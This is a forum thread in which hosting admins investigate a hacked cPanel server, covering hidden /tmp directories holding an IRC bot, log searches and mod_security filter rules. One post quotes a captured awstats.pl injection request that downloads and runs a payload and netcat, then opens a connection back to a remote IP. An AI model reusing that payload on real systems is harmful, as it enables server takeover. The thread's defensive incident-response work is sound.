|
||||
|
Hi,
I have a really weird problem..... He hosted ( via hack ) his domain on one of our cpanel servers .. the place where he hosted his site was /usr/local/apache/.../ . I removed him from the server and he went and hosted it in one of my different servers...( actually, he tried it on many servers with that ip series.... ). Now, after removing him several times, he has switched to another hosts... I have been watching this site, and it's switching servers very easily.... the website in question is http://hothackers.com I really don't understand, how he edits the httpd.conf ( permission 644, owned by root ) file and add entries which he like... The kernel on our server is 2.4.29-ow1 ( The open wall kernel is meant to be a secure one )... And the kernels are statically compiled( monolithic kermnel ) to avoid module level hacking. He has hacked both the Redhat9 and CentOS servers..... cpanel is updated to the latest stable version... Any idea how he's hacking , and how it can be prevented? At the meantime, he doesn;t have any problem hosting his site for free on anywhere he wants... Luckily, he is not with me anymore... he seems to be on a server hosted by theplanet.... And all his files are under the ownership of bin.... Anyone had any such experiences before? Any ideas would be greatly appreciated.... Regards, Amal. |
|
|||
|
Check your domlogs
They get in mostly from holes in PHP aps They then install their own shell app and god know what. Also check your tmp directories for stuff like .../ I suggest you run securetmp which helps |
|
||||
|
Such files/directories are usually best deleted through sFTP - if you're not careful you can end up wiping your whole server.
__________________
Jonathan Michaelson cPanel Forum Moderator Need your cPanel servers secured and tuned? cPanel Server Configuration, Security, Recovery and Antivirus/AntiSpam Services Developers of the most effective (and free) Firewall & Security Solution for cPanel Servers - csf http://www.configserver.com |
|
|||
|
If this is the only directory in /tmp you could hit tab and it will put it in the shell prompt. I have also been able to do cd ".\ /". I usually just rename the directory then go in there to see what is there and then remove it.
|
|
|||
|
It can be deleted and it's where the main hacker files are located.
It may have a space before or after the name. They sometimes place several spaces after the name. So you have .../[space] or what ever ---- (where [space] is a space) Just do rm -fr .../ Make sure you get the line right else you may erase the wrong thing. Try the cd command first - if you can cd to it then you know how to delete it. You need to do three things fast. First get rid of his files. Reboot the server right after you delete the files. Last you need to find the PHP app he used to get in. This is the hard part. Look for stuff like mydomain.com/help.php?q=http://somedomain The hacker passes a domain to the app and it invokes the download of the tools the hacker uses which winds up in your tmp directory. If you didn't use the script securetmp then you may find these files in usr/tmp or var/tmp as well Securetmp makes it harder for them to do this stuff but is not 100% and a good hacker can get around it. Vin |
|
|||
|
Hello all.
Yes, it is "/tmp/..\[space]/" and files in it: Code:
drwx------ 3 nobody nobody 1024 May 1 06:10 ./ drwxrwxrwt 7 root root 406528 May 7 08:40 ../ -rw-r--r-- 1 nobody nobody 307 Mar 27 11:50 1.users -rw-r--r-- 1 nobody nobody 393 Mar 27 11:51 2.users -rw-r--r-- 1 nobody nobody 393 Mar 27 11:52 3.users -rw-r--r-- 1 nobody nobody 45 Feb 2 14:28 bebe.tgz -rw-r--r-- 1 nobody nobody 34 Aug 15 2004 LinkEvents -rw-r--r-- 1 nobody nobody 4008 Mar 27 11:46 mech.set drwx------ 2 nobody nobody 1024 May 1 06:10 randfiles/ -rwx------ 1 nobody nobody 472230 Aug 15 2004 smbd* -rwxr-xr-x 1 nobody nobody 53 Aug 15 2004 start* Code:
drwx------ 3 nobody nobody 1024 May 7 01:21 ./ drwxrwxrwt 7 root root 406528 May 7 08:44 ../ -rw-r--r-- 1 nobody nobody 608 May 7 00:00 1.users -rw-r--r-- 1 nobody nobody 607 May 7 00:00 2.users -rw-r--r-- 1 nobody nobody 610 May 7 00:00 3.users -rw-r--r-- 1 nobody nobody 45 Feb 2 14:28 bebe.tgz -rw-r--r-- 1 nobody nobody 82057 May 7 00:00 JoJo.seen -rw-r--r-- 1 nobody nobody 2706 May 5 19:51 LinkEvents -rw-r--r-- 1 nobody nobody 1033 May 7 00:00 mech.levels -rw------- 1 nobody nobody 5 May 2 12:25 mech.pid -rw-r--r-- 1 nobody nobody 1349 May 7 00:00 mech.session -rw-r--r-- 1 nobody nobody 4008 Mar 27 11:46 mech.set drwx------ 2 nobody nobody 1024 May 7 01:21 randfiles/ -rwx------ 1 nobody nobody 472230 Aug 15 2004 smbd* -rwxr-xr-x 1 nobody nobody 53 Aug 15 2004 start* -rw-r--r-- 1 nobody nobody 79359 May 7 00:00 TaKe.seen -rw-r--r-- 1 nobody nobody 82548 May 7 00:00 ToTo.seen
Last edited by iCARus; 05-07-2005 at 03:30 AM. |
|
|||
|
Delete the directory and files
run the script sercuretmp - this will help He is using your server to spread a virus by sending emails out You need to now find out how he got in. Run these commands in shell and look for any refference to tmp cd /usr/local/apache/domlogs grep "/tmp" *;grep Wget *;grep wget * You can run them one at a time like grep "/tmp" * if you get too much output or send the output to a file. You will see something like somefile.php?q=some_url The URL for some_url is another infected server I would send them an email to notify them their server has been hacked. Hackers use your server to A: break into other servers B: launch attacks or send virus emails out to hundreds of thousands. There should be a government agency to crack down on these people but there is none. Over time they will get better at hacking and it will create a major problem for the internet. Most hackers are just in the learning stages at this point - thank god for that. When they become pros you will have little defense and maybe no defense. Vin |
|
|||
|
Thank you all for replies...
1. we have installed Chkrootkit and RKhunter and everything looks ok 2. if we try to look into domlogs we get error "-bash: /bin/grep: Argument list too long" ...is there any other way to look into over 100 logs ? 3. we deleted created dirs in /tmp 4. from the first day we use /tmp secured with securetmp |
|
|||
|
you should be able to run the commands one by one.
grep "/tmp" * grep wget * grep Wget * The first one will most likely show the most info on your hacker. RKhunter is good to have but it shows false alarms for a few things. You can also run this: find / -type d -name ".*" -print It will search your whole hard drive for funky entries You will get many show up like ./foldername and some files that begin with a dot. Those are normal - just look for ones that are not normal looking. Vin |
|
|||
|
I see a frequent appearances of these in domlogs:
/cgi-bin/awstats.pl?configdir=%20%7c%20cd%20%2ftmp%3bwget%2 0ra-ducu.go.ro%2fb.tgz%3btar%20xzvf%20b.tgz%3bcd%20b%3 b.%2fstart%3bcd%20..%3brm%20-rf%20b.tgz%3brm%20-rf%20b%3bwget%20ra-ducu.go.ro%2fnc%3bchmod%20%2bx%20nc%3b.%2fnc%2066. 221.209.161%2065000%3bwget%20excalibur.go.ro%2ffir ewall%3bchmod%20%2bx%20firewall%3b.%2ffirewall%3bh istory%20-c%20%7c%20 HTTP/1.1" 406 352 0 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts)" "-" "-" i do not have awstats activated. This happens on 2 domains very frequently. 406 because of mod_sec and it's all coming from cihost ip : 66.221.200.58 Anup |
|
|||
|
Might want to add
SecFilter "tar/x20" SecFilter "go.ro" SecFilter "chmod/x20" SecFilter "wget" SecFilter "rm/x20-rf" This should help, of course, make sure mod_security is active on servers, also remove that script, and when the process is running, use ps -u nobody to get the pid, then go to /proc/(pid) and ls -al. You may see some virtual linked files to where the files are, usually /dev/shm, or /tmp, sometimes /var/spool i've seen, sometimes even /usr/local/apache/proxy, also cat the process's enviroment, might be able to pull a directory from there. Also, this shouldn't cause any issues with regular sites, seems to be using Awstats exploit via script, or he's just uploading a script and calling it that SecFilter "awstats.pl" Since people should be acessing Awstats via Cpanel regardless shouldnt cause any issues. Thanks, Kris Kris@HostMerit.com |
![]() |
| Thread Tools | |
| Display Modes | |
|
|